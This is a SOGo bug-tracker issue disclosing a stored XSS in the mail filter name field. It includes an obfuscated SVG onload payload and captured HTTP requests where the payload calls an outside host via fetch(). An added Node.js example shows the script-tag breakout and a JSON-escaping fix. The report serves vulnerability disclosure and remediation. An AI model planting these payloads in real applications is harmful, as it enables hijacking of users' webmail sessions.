View Issue Details

ID: 0006008
Project: SOGo
Category: Web Preferences
View Status: public
Last Update: 2024-09-12 06:58
Reporter: julian123
Assigned To: qhivert
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: duplicate
Platform: [Server] Linux
OS: Ubuntu
OS Version: 16.04 LTS
Product Version: 5.10.0
Summary0006008: Stored-XSS in Mail Filters Field
Description

A cross-site scripting payload can be stored as a filter name, leading to execution when the user navigates to their inbox.

Steps To Reproduce
  1. Authenticate to the application.
  2. Navigate to Preferences > Mail > Filters.
  3. Select Create Filter.
  4. In the filter name, add the following payload:
     //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
  5. Select OK.
  6. Navigate to the user's inbox and observe the XSS payload execute.
Additional Information

POST /SOGo/so/sam@123.com/Preferences/save HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.96/
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: a49754c88694526868cabce81257ee1e55990205
Content-Length: 5017
Origin: http://192.168.2.96
DNT: 1
Sec-GPC: 1
Connection: keep-alive
...snip...
],"SOGoMailDisplayRemoteInlineImages":"never","hasActiveExternalSieveScripts":false,"SOGoSieveFilters":[{"match":"all","active":1,"name":"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=fetch('https://jkq.ca/tango-1191/10')//>\\\\x3e","rules":[{"field":"subject","operator":"contains","value":"123"}

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Aug 2024 10:10:46 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 0
Connection: keep-alive
Strict-Transport-Security: max-age=15768000;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin

GET /SOGo/so/sam@123.com/Calendar/view HTTP/1.1
Host: 192.168.2.96
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.96/
DNT: 1
Sec-GPC: 1
Connection: keep-alive

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Aug 2024 10:11:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 82887
Connection: keep-alive
Strict-Transport-Security: max-age=15768000;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin
...snip...
,"SOGoSieveFilters":[{"actions":[{"argument":"Drafts","method":"fileinto"}],"name":"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=fetch('https://jkq.ca/tango-1191/10')//>\\\\x3e","rules":[{"field":"subject","operator":"contains","value":"123"}
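The response above shows the reporter's filter name echoed unmodified inside a text/html page as part of the serialized preferences. The payload's "</scRipt/" sequence ends any script block it lands in, and the rest is then parsed as markup, which is why the "\x3c" JavaScript-string escape in the payload is not even needed for the breakout. The following is an added example, not code from this report or from SOGo: it embeds the same constructed preferences object in a script block the unsafe way and the safe way (escaping "<", ">", "&" and the U+2028/U+2029 line terminators as JSON \uXXXX escapes, which keeps the output valid JSON), and includes a check that flags the end-tag breakout the HTML tokenizer would honour. It assumes Node.js only; the function names and the "var prefs = ..." wrapper are illustrative.

```javascript
// Added example (not SOGo code): embedding server-side JSON state such as a
// Sieve filter list into an HTML page, and detecting a script-context breakout.
// Runs under Node.js with no dependencies.

// Constructed sample: the filter name from this report, as the browser sends it
// (the "\x3c" and "\x3e" are literal backslash sequences typed by the user).
const FILTER_NAME =
  "//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1)//>\\x3e";

const preferences = {
  SOGoSieveFilters: [
    {
      match: "all",
      active: 1,
      name: FILTER_NAME,
      rules: [{ field: "subject", operator: "contains", value: "123" }],
    },
  ],
};

// Unsafe: raw JSON.stringify inside <script>. The HTML tokenizer stops script
// data at "</script" followed by whitespace, "/" or ">", case-insensitively,
// regardless of JavaScript string context, so "</scRipt/--!>" ends the block.
function unsafeScriptTag(obj) {
  return `<script>var prefs = ${JSON.stringify(obj)};</script>`;
}

// Safe: rewrite the characters that matter to the HTML parser as JSON unicode
// escapes. The result is still valid JSON (JSON.parse returns the original
// string), so the client code reading it does not change, but the tokenizer
// never sees "</", "<!--" or a line terminator inside the block.
function jsonForScript(obj) {
  return JSON.stringify(obj).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function safeScriptTag(obj) {
  return `<script>var prefs = ${jsonForScript(obj)};</script>`;
}

// Check for a generated script block: any end-tag sequence inside the block
// body is a breakout, whatever the surrounding JavaScript looks like.
function hasScriptBreakout(scriptTag) {
  const body = scriptTag.replace(/^<script>/, "").replace(/<\/script>$/, "");
  return /<\/script[\s/>]/i.test(body);
}

// Round-trip helper: recover the embedded object from the safe output.
function parseEmbedded(scriptTag) {
  const prefix = "<script>var prefs = ";
  const suffix = ";</script>";
  return JSON.parse(scriptTag.slice(prefix.length, -suffix.length));
}

console.log("unsafe breakout:", hasScriptBreakout(unsafeScriptTag(preferences)));
console.log("safe breakout:", hasScriptBreakout(safeScriptTag(preferences)));
console.log(
  "round-trip ok:",
  parseEmbedded(safeScriptTag(preferences)).SOGoSieveFilters[0].name === FILTER_NAME
);
```

Escaping at the JSON layer rather than HTML-entity-encoding the whole blob is the point: `&lt;` would break JSON.parse on the client, while `\u003c` is transparent to it. The same filter name also needs ordinary HTML escaping wherever the Preferences UI renders it as text, since the script-block fix does nothing for that second context.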

Tags: preferences

Relationships

related to 0006010 closed qhivert Stored-XSS in Reply to Email
related to 0006004 assigned qhivert Stored-XSS in Contacts Category Fields

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2024-08-20 00:00 julian123 New Issue
2024-08-20 00:00 julian123 Tag Attached: preferences
2024-08-20 14:07 qhivert Relationship added related to 0006010
2024-08-20 14:08 qhivert Relationship added related to 0006004
2024-09-12 06:58 qhivert Assigned To => qhivert
2024-09-12 06:58 qhivert Status new => closed
2024-09-12 06:58 qhivert Resolution open => duplicate